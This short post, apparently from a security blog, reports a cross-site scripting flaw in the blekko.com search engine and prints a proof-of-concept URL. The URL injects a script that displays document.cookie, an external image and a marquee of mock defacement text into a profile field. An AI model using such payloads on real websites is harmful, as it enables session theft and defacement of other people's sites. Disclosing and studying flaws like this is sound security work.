A Hacker sony reported a new a XSS vulnerability found in blekko.com, one of web search engine. Blekko is a web search engine whose goal is to provide better search results than those offered by Google Search, by offering results culled from a set of 3 billion trusted websites and excluding material from such sites as content farms. The site, launched to the public on November 1, 2010, uses slashtags to provide results for common searches.
Screenshot:
Screenshot:
Poc:
http://blekko.com/tag/profile?m=1&email=editpro%2540bk.ru&name=&desc=&website=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cimg%20src=%20http://www.tnr.com/sites/default/files/imagecache/thumbnail_landing/RomaniaFlag.jpg%20align=center%3E%3Cmarquee%20scrollamount=%223%22%3ESystem%20Error..well,%20joke,%20it%27s%20only%20xss..We%20can%20see%20Cross%20Site%20Scripting%20on%20the%20Blekko%20-%20web%20search%20engine.%20By%20Sony.%20http://st2tea.blogspot.com%3C/marquee%3E
source:
st2tea.blogspot.com
 Vulnerable to XSS(cross site scripting)){kind=link}